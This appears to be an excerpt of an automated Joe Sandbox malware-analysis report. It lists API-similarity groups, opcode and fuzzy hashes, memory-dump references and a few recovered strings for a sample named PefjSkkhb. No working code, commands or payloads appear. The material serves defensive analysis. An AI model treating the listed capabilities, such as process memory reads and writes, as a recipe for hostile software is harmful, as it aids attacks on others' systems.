                                                                      • Instruction Fuzzy Hash: E6A11562B4878246FB60BF6092103F9E695AF00BB4F984636DA1D877E5DF7CF44483A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2227131780-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 3488606520-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 3451389628-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                      • String ID:
                                                                      • API String ID: 3659116390-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                      • String ID:
                                                                      • API String ID: 3740051246-0
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED176
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED217
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED236
                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED281
                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7C0EEC2BF), ref: 00007FF7C0EED2A0
                                                                        • Part of subcall function 00007FF7C0E74120: WideCharToMultiByte.KERNEL32 ref: 00007FF7C0E74160
                                                                        • Part of subcall function 00007FF7C0E74120: WideCharToMultiByte.KERNEL32 ref: 00007FF7C0E7419C
                                                                      Similarity
                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                      • String ID:
                                                                      • API String ID: 666041331-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                      • String ID:
                                                                      • API String ID: 4136290138-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                      • String ID:
                                                                      • API String ID: 2832842796-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID:
                                                                      • API String ID: 190572456-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable
                                                                      • String ID:
                                                                      • API String ID: 2939132127-0
                                                                      • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                      • Instruction ID: 65c117d54106136db9d1b6b7d36eee8c797969f8ed0bbd57f68ac9a20c85c751
                                                                      • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                                      • Instruction Fuzzy Hash: 54513D32A0D68681EB519F55D454778B7A0FB84BA8FA84032CE4D873A0CF7DF485D7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleep$RectWindow
                                                                      • String ID:
                                                                      • API String ID: 3382505437-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                      • String ID:
                                                                      • API String ID: 2256411358-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
                                                                      • String ID:
                                                                      • API String ID: 2655805287-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 2067211477-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
                                                                      • String ID:
                                                                      • API String ID: 2117695475-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED003C
                                                                      • TerminateThread.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED0047
                                                                      • WaitForSingleObject.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED0055
                                                                      • ~SyncLockT.VCCORLIB ref: 00007FF7C0ED005E
                                                                        • Part of subcall function 00007FF7C0ECF7B8: CloseHandle.KERNEL32(?,?,?,00007FF7C0ED0063,?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ECF7C9
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7C0EB29AD,?,?,?,00007FF7C0E62AB2), ref: 00007FF7C0ED006A
                                                                      Similarity
                                                                      • API ID: CriticalSection$CloseEnterHandleLeaveLockObjectSingleSyncTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3142591903-0
                                                                      • Opcode ID: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                      • Instruction ID: debebd88ee926c97e68e05484dc8ff3ac75712c13a5d62b2aab0c1d01220c8a8
                                                                      • Opcode Fuzzy Hash: ba6bd7e5b15845e6b6bdca5424b03e7aeaa25a678f545ea5128a0138939c9a9e
                                                                      • Instruction Fuzzy Hash: 89014C3AA18B41D6E741EF15E44022EB360FB88B64F944431DB8D83B55CF3CE492C790
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction ID: 148e3de9af79d6ee44703581a5d4b5b16290bb5a0dc6dd1a82ebb7066d36db66
                                                                      • Opcode Fuzzy Hash: c45599d3bc9fc7debef7ab567c3c0eb4022d53e70f819905b21d88790cde579c
                                                                      • Instruction Fuzzy Hash: 56015E2190CA4381F7557F50A984735A761BF05BB4F984934CD1D863A0CFBDB0D583A0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorExitLastThread
                                                                      • String ID:
                                                                      • API String ID: 1611280651-0
                                                                      • Opcode ID: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                      • Instruction ID: e006024a1d837dae0727ce351bbe9c9412191540980b5100b27dd227eb3ae6d4
                                                                      • Opcode Fuzzy Hash: 99fd53b48de60ad2b3b37300d72bcddb8f2580f530d7a1e219e10e2618182fab
                                                                      • Instruction Fuzzy Hash: 8A012C21B08A8692EB157F24954823CA265FF40F79F901734C63E827D5DF7CB8988390
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction ID: 9ddcab31ebb658d7f67aac314c092c77c4e93767206f8faa09f817037f1d349f
                                                                      • Opcode Fuzzy Hash: 3c9aaefa71688af513bcff76e9269722b622f20c654f000aa95846671475ad7f
                                                                      • Instruction Fuzzy Hash: 5DF03014F5C71282FB193FB5684827A93527F88B65FC45030CD1A92352DFAEB4D546A0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                      • String ID:
                                                                      • API String ID: 179993514-0
                                                                      • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction ID: e4a8f70f9a17e13bd181a85b0de27fb2c7271ca4c590a5e0be5b972ae6af4d96
                                                                      • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                      • Instruction Fuzzy Hash: 01F03010F5C71242FB553F76A84827692527F48B69FC45030C90A92352DFAEB4D646E0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 948891078-24824748
                                                                      • Opcode ID: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction ID: ffd4e7d3fa4b552934b3e6a56028aec7d06797def8234cc288f63cc6943e9a10
                                                                      • Opcode Fuzzy Hash: bb49a61337d89a9848f7780026d10ac62e6b3b39f2b5ab5deb7fc3459a4390ae
                                                                      • Instruction Fuzzy Hash: EED1B572B58B5681EB10FF25D4902ADA760FB80B98F805431EE4E87B65EF3CE545C790
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                      • String ID: .lnk
                                                                      • API String ID: 3769357847-24824748
                                                                      • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                      • Instruction ID: eaf7c9e3b04ad3bac2898ebaa543fea1e910e39f8d2b11de8546bafa56ebd979
                                                                      • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                      • Instruction Fuzzy Hash: BFD16C36B48B5685EB10FF66D0802AD77B4FB48B98B884432DE4D87BA5DF39E445C390
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                      • API String ID: 3215553584-1196891531
                                                                      • Opcode ID: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                      • Instruction ID: 5bfdbcf9921fbd2f0808dbebf0b143690756fabbc2ecd21530dcc1be8cbbf553
                                                                      • Opcode Fuzzy Hash: c3c6110ef47f8474b3aee38d103288009a94a732d54534d718fbbb8757739500
                                                                      • Instruction Fuzzy Hash: 5B81C272E8D2028EFB647F1696443BDA6E0AF11764FC48035DA0ED3791DB2EF850D2A1
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      • Opcode ID: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction ID: e3b74644c1d058b8d15ba65488878f64796e245b75eb6f590fc50251dd3b9edd
                                                                      • Opcode Fuzzy Hash: e1993591883a1ee4d578272befcf29134d05160a5f94b748d186053ef0cddf2b
                                                                      • Instruction Fuzzy Hash: 1161647298D2429AE765BF2C805C37CB7A0EB45B28F941135D64AC5399CF6CF481CFA1
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$acos
                                                                      • API String ID: 1156100317-2870037509
                                                                      • Opcode ID: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction ID: f4e42d1382cfbd67927e4f905e7418f189ef9f567b0fb7af1158045862390f30
                                                                      • Opcode Fuzzy Hash: 0d89aa78777a41b63d954a76095aee346a1dbdd639e7adc8a9fc006d5894d638
                                                                      • Instruction Fuzzy Hash: A361B821D2CF8584E223AF385861276D758BFA63E4F918336E91EB5B64DF1CB0824790
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID: !$asin
                                                                      • API String ID: 1156100317-2188059690
                                                                      • Opcode ID: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction ID: cb4e5b9d67f5b4d746432695d59ca301a269af733d2134e4fc8bb4b955090d87
                                                                      • Opcode Fuzzy Hash: dda4458e7c1e859fb838f80da50bdd89987d805c8091ebd73b4f99c53429eb29
                                                                      • Instruction Fuzzy Hash: 1C61A621D1CF8185E253AF389811376D758BF963E4F908332E96EB5B65DF2CB0824790
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction ID: 3894e7019747b6ccea7143c8650f8248db0879bea6027dc24e162f9abf2f5932
                                                                      • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                      • Instruction Fuzzy Hash: B551C27661868182D720EF52E4855AEFB60F7C8BA4F801135EE4E93B45DF7CE505CB50
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: P
                                                                      • API String ID: 135850232-3110715001
                                                                      • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction ID: c2897fd9eb71ba23fd55493ba322b6073f68f9abd5e23bd91d259aea27c42dbc
                                                                      • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                                      • Instruction Fuzzy Hash: DC41D522A44A9182EB21FF15C4443A9A760FB84FB4F998231EA2D837D1DF39F442C760
                                                                      Similarity
                                                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                      • String ID: U
                                                                      • API String ID: 2456169464-4171548499
                                                                      • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction ID: a2562f8d84a4c134c28d70d3e56a241387db4cbbf48cdf38e2377958d3011002
                                                                      • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                      • Instruction Fuzzy Hash: C841A722B1DA8182EB20AF15E4443BAB7A1F788BA4F804131EE4EC7758DF7CE441C790
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction ID: 8ad255b7a470db96e3fa853a692fdee17370aac8844593710744b0943bf65a76
                                                                      • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                      • Instruction Fuzzy Hash: BE416E326097918AE770EF18E444B9AB3A1F784764F544335DAA843B99CF3CE885CF90
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateObjectStock
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2671490118-1439706946
                                                                      • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction ID: 91b65266c9fd07d113b1a0ba49b89caadefe2ce9d5ca5d246ce130cb04ae99a4
                                                                      • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                                      • Instruction Fuzzy Hash: E4417F326086C1CBE730DF15E444B5AF7A0F7887A4F904225EA9947B98DF3CE4858F40
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyObjectStock
